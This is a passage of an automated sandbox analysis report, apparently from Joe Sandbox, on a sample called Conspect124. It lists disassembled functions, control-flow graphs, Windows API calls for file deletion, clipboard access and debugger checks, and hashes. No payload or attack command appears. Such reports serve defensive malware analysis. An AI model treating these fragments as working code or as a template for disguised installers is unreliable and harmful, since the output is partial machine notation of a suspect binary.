SendMessageW 349->353 354 405039-405040 349->354 358 404fc4-404fce 350->358 359 40520f-405221 call 404248 350->359 361 404f7b-404f85 351->361 362 404f6d-404f79 SendMessageW 351->362 353->354 363 405042-405049 354->363 364 405074-40507b 354->364 355->347 381 404f0e-404f1f 355->381 356->347 356->355 358->359 367 404fd4-404fe3 SendMessageW 358->367 361->342 369 404f87-404f91 361->369 362->361 370 405052-405059 363->370 371 40504b-40504c ImageList_Destroy 363->371 374 4051d1-4051d8 364->374 375 405081-40508d call 4011ef 364->375 367->359 376 404fe9-404ffa SendMessageW 367->376 377 404fa2-404fac 369->377 378 404f93-404fa0 369->378 379 405062-40506e 370->379 380 40505b-40505c GlobalFree 370->380 371->370 374->359 387 4051da-4051e1 374->387 400 40509d-4050a0 375->400 401 40508f-405092 375->401 385 405004-405006 376->385 386 404ffc-405002 376->386 377->342 378->342 379->364 380->379 381->347 389 404f21-404f23 381->389 390 404d9c-404da3 382->390 388 404e71-404e75 383->388 392 405007-405020 call 401299 SendMessageW 385->392 386->385 386->392 387->359 393 4051e3-40520d ShowWindow GetDlgItem ShowWindow 387->393 394 404e77-404e8a ShowWindow call 404216 388->394 395 404e8f-404e97 call 404216 388->395 396 404f25-404f2c 389->396 397 404f36 389->397 398 404e39-404e4c 390->398 399 404da9-404dd1 390->399 392->349 393->359 394->359 395->327 409 404f32-404f34 396->409 410 404f2e-404f30 396->410 413 404f39-404f55 call 40117d 397->413 398->390 404 404e52-404e56 398->404 411 404dd3-404e09 SendMessageW 399->411 412 404e0b-404e0d 399->412 405 4050e1-405105 call 4011ef 400->405 406 4050a2-4050bb call 4012e2 call 401299 400->406 414 405094 401->414 415 405095-405098 call 404bfa 401->415 404->383 404->388 428 4051a7-4051bb InvalidateRect 405->428 429 40510b 405->429 436 4050cb-4050da SendMessageW 406->436 437 4050bd-4050c3 406->437 409->413 410->413 411->398 416 404e20-404e36 SendMessageW 412->416 417 404e0f-404e1e SendMessageW 412->417 413->347 414->415 415->400 416->398 417->398 428->374 431 4051bd-4051cc call 404b4d call 404b35 428->431 432 40510e-405119 429->432 431->374 433 40511b-40512a 432->433 434 40518f-4051a1 432->434 438 40512c-405139 433->438 439 40513d-405140 433->439 434->428 434->432 436->405 440 4050c5 437->440 441 4050c6-4050c9 437->441 438->439 443 405142-405145 439->443 444 405147-405150 439->444 440->441 441->436 441->437 446 405155-40518d SendMessageW * 2 443->446 444->446 447 405152 444->447 446->434 447->446
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                      • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                      • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                      • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                      • DeleteObject.GDI32(00000000), ref: 00404D22
                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                      • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                      • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                      • GlobalFree.KERNEL32(?), ref: 0040505C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                      • InvalidateRect.USER32(?,00000000,?), ref: 004051AD
                                      • ShowWindow.USER32(?,00000000), ref: 004051FB
                                      • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                      • ShowWindow.USER32(00000000), ref: 0040520D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: 125841dbcfbf331540c9fc092a0589468b1b95d737e95b25a90a5aa385748766
                                      • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                      • Opcode Fuzzy Hash: 125841dbcfbf331540c9fc092a0589468b1b95d737e95b25a90a5aa385748766
                                      • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                      Function 0040595A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,00437800,74DF3420,00000000), ref: 00405983
                                      • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,00437800,74DF3420,00000000), ref: 004059CB
                                      • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,00437800,74DF3420,00000000), ref: 004059EE
                                      • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,00437800,74DF3420,00000000), ref: 004059F4
                                      • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,00437800,74DF3420,00000000), ref: 00405A04
                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                      • FindClose.KERNEL32(00000000), ref: 00405AB3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2035342205-1173974218
                                      • Opcode ID: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
                                      • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                      • Opcode Fuzzy Hash: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
                                      • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                      Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                      • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                      • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                      • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                      Function 0040658F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,74DF3420,0040597A,?,00437800,74DF3420), ref: 0040659A
                                      • FindClose.KERNEL32(00000000), ref: 004065A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: 8gB
                                      • API String ID: 2295610775-1733800166
                                      • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                      • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                      • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                      • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                      Function 23BC60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 23BC61DA
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 23BC61E4
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 23BC61F1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 5e9e2830579dfde866567ca68990346ba0279e062272307fae6d92fa766b445a
                                      • Instruction ID: 3ad1919c97c0c9aae1c146cb5191e2273e9adcda40f7ffdb2ddb1cf997ae3bb3
                                      • Opcode Fuzzy Hash: 5e9e2830579dfde866567ca68990346ba0279e062272307fae6d92fa766b445a
                                      • Instruction Fuzzy Hash: C531C474D1121C9BCB21DF24D988B8DBBB8EF18710F5045EAE81CAB260E7349B818F45
                                      Function 23BC4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,23BC4A8A,?,23BD2238,0000000C,23BC4BBD,00000000,00000000,?,23BC2082,23BD2108,0000000C,23BC1F3A,?), ref: 23BC4AD5
                                      • TerminateProcess.KERNEL32(00000000,?,23BC4A8A,?,23BD2238,0000000C,23BC4BBD,00000000,00000000,?,23BC2082,23BD2108,0000000C,23BC1F3A,?), ref: 23BC4ADC
                                      • ExitProcess.KERNEL32 ref: 23BC4AEE
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 710cbdf17c6f2d3d5359e698cfa050cf2a6d52e2f9a372c0fb5acb9086bd52b8
                                      • Instruction ID: 8761853ecdc53ae7db10a4170ecd50fcb313221606b091500f46e3c4885d3fe6
                                      • Opcode Fuzzy Hash: 710cbdf17c6f2d3d5359e698cfa050cf2a6d52e2f9a372c0fb5acb9086bd52b8
                                      • Instruction Fuzzy Hash: 33E04F35100644AFCF22BF28CE18A493B29FF18341F004868F90447421CB39DA53CB44
                                      Function 23BC724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 7199a2d99c3b66f484d8e77822b44e1eb046b6af2c822ab9e0f7bb708c56b72f
                                      • Instruction ID: c4cf972f4f9c4833798ceadcc7f179c926c38f0a9c8452dfc254349bcba76e50
                                      • Opcode Fuzzy Hash: 7199a2d99c3b66f484d8e77822b44e1eb046b6af2c822ab9e0f7bb708c56b72f
                                      • Instruction Fuzzy Hash: FDA0113820020A8F8320AF38833A20C3AACAE28280B00002EA80CCA800EB38C0208A08
                                      Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 275 4053ef-40540a 276 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 275->276 277 405599-4055a0 275->277 295 4054f5-4054f8 276->295 296 4054d9-4054f3 SendMessageW * 2 276->296 278 4055a2-4055c4 GetDlgItem CreateThread CloseHandle 277->278 279 4055ca-4055d7 277->279 278->279 282 4055f5-4055ff 279->282 283 4055d9-4055df 279->283 287 405601-405607 282->287 288 405655-405659 282->288 285 4055e1-4055f0 ShowWindow * 2 call 404216 283->285 286 40561a-405623 call 404248 283->286 285->282 299 405628-40562c 286->299 292 405609-405615 call 4041ba 287->292 293 40562f-40563f ShowWindow 287->293 288->286 290 40565b-405661 288->290 290->286 297 405663-405676 SendMessageW 290->297 292->286 300 405641-40564a call 4052b0 293->300 301 40564f-405650 call 4041ba 293->301 303 405508-40551f call 4041e1 295->303 304 4054fa-405506 SendMessageW 295->304 296->295 305 405778-40577a 297->305 306 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 297->306 300->301 301->288 314 405521-405535 ShowWindow 303->314 315 405555-405576 GetDlgItem SendMessageW 303->315 304->303 305->299 312 4056a9-4056b9 GetWindowRect 306->312 313 4056bc-4056d1 TrackPopupMenu 306->313 312->313 313->305 316 4056d7-4056ee 313->316 317 405544 314->317 318 405537-405542 ShowWindow 314->318 315->305 319 40557c-405594 SendMessageW * 2 315->319 320 4056f3-40570e SendMessageW 316->320 321 40554a-405550 call 404216 317->321 318->321 319->305 320->320 322 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 320->322 321->315 324 405735-40575c SendMessageW 322->324 324->324 325 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 324->325 325->305
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                      • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                      • GetClientRect.USER32(?,?), ref: 00405499
                                      • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                      • ShowWindow.USER32(?,00000008), ref: 0040553C
                                      • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                      • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                        • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,?,00404041), ref: 00404224
                                      • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                      • CloseHandle.KERNEL32(00000000), ref: 004055C4
                                      • ShowWindow.USER32(00000000), ref: 004055E8
                                      • ShowWindow.USER32(?,00000008), ref: 004055ED
                                      • ShowWindow.USER32(00000008), ref: 00405637
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                      • CreatePopupMenu.USER32 ref: 0040567C
                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
                                      • GetWindowRect.USER32(?,?), ref: 004056B0
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                      • OpenClipboard.USER32(00000000), ref: 00405711
                                      • EmptyClipboard.USER32 ref: 00405717
                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                      • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                      • CloseClipboard.USER32 ref: 00405772
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: {$6B
                                      • API String ID: 590372296-3705917127
                                      • Opcode ID: f207d9dfce8d81be78cd7e6ccb04fd8fa9cb690570b2b3c7b57706b457d87968
                                      • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                      • Opcode Fuzzy Hash: f207d9dfce8d81be78cd7e6ccb04fd8fa9cb690570b2b3c7b57706b457d87968
                                      • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                      Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 448 403d08-403d1a 449 403d20-403d26 448->449 450 403e5b-403e6a 448->450 449->450 451 403d2c-403d35 449->451 452 403eb9-403ece 450->452 453 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 450->453 457 403d37-403d44 SetWindowPos 451->457 458 403d4a-403d4d 451->458 455 403ed0-403ed3 452->455 456 403f0e-403f13 call 40422d 452->456 453->452 462 403ed5-403ee0 call 401389 455->462 463 403f06-403f08 455->463 470 403f18-403f33 456->470 457->458 459 403d67-403d6d 458->459 460 403d4f-403d61 ShowWindow 458->460 465 403d89-403d8c 459->465 466 403d6f-403d84 DestroyWindow 459->466 460->459 462->463 484 403ee2-403f01 SendMessageW 462->484 463->456 469 4041ae 463->469 474 403d8e-403d9a SetWindowLongW 465->474 475 403d9f-403da5 465->475 471 40418b-404191 466->471 473 4041b0-4041b7 469->473 477 403f35-403f37 call 40140b 470->477 478 403f3c-403f42 470->478 471->469 479 404193-404199 471->479 474->473 482 403e48-403e56 call 404248 475->482 483 403dab-403dbc GetDlgItem 475->483 477->478 480 403f48-403f53 478->480 481 40416c-404185 DestroyWindow EndDialog 478->481 479->469 486 40419b-4041a4 ShowWindow 479->486 480->481 487 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 480->487 481->471 482->473 488 403ddb-403dde 483->488 489 403dbe-403dd5 SendMessageW IsWindowEnabled 483->489 484->473 486->469 518 403fb0-403fec ShowWindow EnableWindow call 404203 EnableWindow 487->518 519 403fa8-403fad 487->519 492 403de0-403de1 488->492 493 403de3-403de6 488->493 489->469 489->488 496 403e11-403e16 call 4041ba 492->496 497 403df4-403df9 493->497 498 403de8-403dee 493->498 496->482 502 403e2f-403e42 SendMessageW 497->502 503 403dfb-403e01 497->503 501 403df0-403df2 498->501 498->502 501->496 502->482 506 403e03-403e09 call 40140b 503->506 507 403e18-403e21 call 40140b 503->507 514 403e0f 506->514 507->482 516 403e23-403e2d 507->516 514->496 516->514 522 403ff1 518->522 523 403fee-403fef 518->523 519->518 524 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 522->524 523->524 525 404023-404034 SendMessageW 524->525 526 404036 524->526 527 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 525->527 526->527 527->470 538 404081-404083 527->538 538->470 539 404089-40408d 538->539 540 4040ac-4040c0 DestroyWindow 539->540 541 40408f-404095 539->541 540->471 543 4040c6-4040f3 CreateDialogParamW 540->543 541->469 542 40409b-4040a1 541->542 542->470 544 4040a7 542->544 543->471 545 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 543->545 544->469 545->469 550 404152-40416a ShowWindow call 40422d 545->550 550->471
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                      • ShowWindow.USER32(?), ref: 00403D61
                                      • DestroyWindow.USER32 ref: 00403D75
                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                      • GetDlgItem.USER32(?,?), ref: 00403DB2
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                      • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                      • GetDlgItem.USER32(?,?), ref: 00403E7B
                                      • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EF0
                                      • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                      • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                      • EnableWindow.USER32(?,?), ref: 00403FC9
                                      • EnableWindow.USER32(?,?), ref: 00403FE4
                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FFA
                                      • EnableMenuItem.USER32(00000000), ref: 00404001
                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404019
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                      • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                      • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                      • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                      • String ID: 6B
                                      • API String ID: 184305955-4127139157
                                      • Opcode ID: a4db143bb65d0e391743e1b67bf87524629fdee33245fd25fce41cee6e60d782
                                      • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                      • Opcode Fuzzy Hash: a4db143bb65d0e391743e1b67bf87524629fdee33245fd25fce41cee6e60d782
                                      • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                      Function 0040395A Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
